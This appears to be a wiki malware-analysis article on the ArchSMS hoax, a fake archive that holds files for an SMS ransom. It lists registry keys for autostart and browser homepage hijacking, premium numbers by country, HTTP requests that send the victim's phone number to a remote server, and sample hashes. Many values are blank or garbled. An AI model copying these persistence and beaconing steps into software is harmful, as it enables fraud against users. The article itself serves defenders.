Hoax.Win32.ArchSMS or ArchSMS is a hoax program that attempts to call premium rate numbers. It has multiple variants.


This variant demands a ransom to retrieve contents from an encrypted archive. Once launched, it will create the following registry key:


It will then display a "rules" window, through agreeing, it will ask for a location to unpack the archive into. After imitating the extracted sequence, it will attempt to call a premium number with the following text:


It will also carry out the following HTTP request:

GET /functions/sms-api/sms_from_soft.php?user_phone=
=2855&pt=1 HTTP/1.1
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Host: sti***
Cache-Control: no-cache

The server responds with an interger, such as 123. Furthermore, the support page simply links to the following resource:


This variant has similar behaviour to the previous variant. It will first create the following registry key:

[HKLM\Software\Microsoft\Internet Explorer\Main]
"Start Page"="***"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page"="***"

It will also create the following directory with the est string:


Like the other variant, it prevents a set of rules, and through agreeing it will allow you to unpack an archive. However, it will set a ransom for this archive, and it will also call the following numbers with the string 43***04

Austria 0930399999
Belgium         7796
Bulgaria        1098
Czech Republic          9090199
Germany 80888
Denmark         1945
Estonia 17013
Spain   5339
Finland 179479
France  83868
Hungary 90645045
Kyrgyzstan      1171
Lithuania               1645
Latvia          1874
Netherlands     7117
Norway  2322
Poland          7910
Portugal        68305
Sweden          72170

If the infected machine is situated in Urkraine, it will text the string 77***01 to the number 4161.

Furthermore, it will send the following HTTP request

GET /pass_request/?guid=3de9581b497e3ea0b9c822735a719b00
&xid=&nomer=+7<telephone number>m=zb&fn=&xtime=
<rnd1>&lp=<rnd2> HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Opera 10
Connection: Keep-Alive

This variant will serve the same payload as all of the previous variants, with some differences. First it will rig your system to always run the hoax on startup.

"winxrar" = ""<full path to original Trojan file>" autostart"

It will then create the following registry keys:

"(Default)" = "%System%\scrrun.dll"
"ThreadingModel" = "Both"
"(Default)" = "Scripting.FileSystemObject"
"(Default)" = "{420B2830-E718-11CF-893D-00A0C9054228}"
"(Default)" = "1.0"
"{I72A1C76714CAA996}" = "01 00 00 00"
"exerunner" = "was"
"runcounter" =

After these two actions have been performed, it will hijack Internet Explorer, setting the home page to a certain website. In order to accomplish this, it will implant the following keys into the registry.

[HKLM\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "***"
"Start Page" = "***"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "***"
"Start Page" = "***"

Furthermore, it will write the string est to the %WorkDir%\xsendexe.tmp directory.

Finally, it will retrieve elements from the following website:



This variant uses elements from previous variants, sharing a very similar payload. It will first create the following registry key:


It will display the "rules" window, where the user will naturally agree and unpack the file. It will then set a ransom for this archive. After this, it will send three SMS messages to premium numbers. Upon confirmation, it will send the following HTTP request.

GET /functions/sms-api/sms_from_soft.php?user_phone=7&flow_id=0&platnik_id=7&num=3855&pt=1
HTTP/1.1Host: stimulprofit.comAccept: text/html, */*, text/xmlAccept-Encoding: identityUser-Agent: Stimulprfit Software

In response it will generate an interger, example: 123.

The SMS message rates are displayed on this site:


The Support link will link to the following website:


The application finally links to the following phishing resources.



Compared to other variants, little is known about this particular variant. This hoax is downloaded from the Internet advertising as a self-extracting archive, containing the files they wish to retrieve. Once the rules have been agreed to, the archive may be "unpacked". The archive is then held for a ransom key. To obtain such code, they must send a text to a premium number. The "information for subscribers" links to the following page.


Technical Details


MD5 What is this?: 13DB8201EA98EC0AB953AAB8111134FA
SHA1 What is this?: 55A8FF534DCA8250E2B424775010516AD12B0ED1

MD5 What is this?: Not available
SHA1 What is this?: Not available

MD5 What is this?: 50886C55EFEB926FA5366AB97C8F6AFA
SHA1 What is this?: 3B67AD4A1D95D8D1FFC27D3E105A36EA6CAB9C2C


MD5 What is this?: cc64ee29fdf3600a0d18be9a07f3bbb6
SHA1 What is this?: 573b780beffda7de9c7fa61826d7bb67aec0ceb8


MD5 What is this?: Not available
SHA1 What is this?: Not available

Ad blocker interference detected!

Wikia is a free-to-use site that makes money from advertising. We have a modified experience for viewers using ad blockers

Wikia is not accessible if you’ve made further modifications. Remove the custom ad blocker rule(s) and the page will load as expected.